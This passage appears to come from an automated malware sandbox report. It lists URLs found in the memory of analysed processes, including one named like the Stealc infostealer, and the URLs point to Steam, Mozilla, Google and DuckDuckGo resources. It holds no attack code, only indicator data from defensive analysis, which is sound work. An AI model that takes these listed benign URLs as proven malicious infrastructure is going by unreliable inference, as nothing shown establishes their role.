                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                          Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=uDUW
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englis
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engli
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=2UcHUv7TDL_s&amp
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
                          Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
                          Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                          Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/log
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/R
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                          Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                          Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                          Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                          Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                          Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                          Source: chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                          Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                          Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab_
                          Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                          Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: svchost.exe, 00000023.00000003.2158177683.000002998D659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                          Source: svchost.exe, 00000023.00000003.2158177683.000002998D600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                          Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                          Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                          Source: chrome.exe, 0000002B.00000003.2265759074.00002298006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                          Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                          Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                          Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
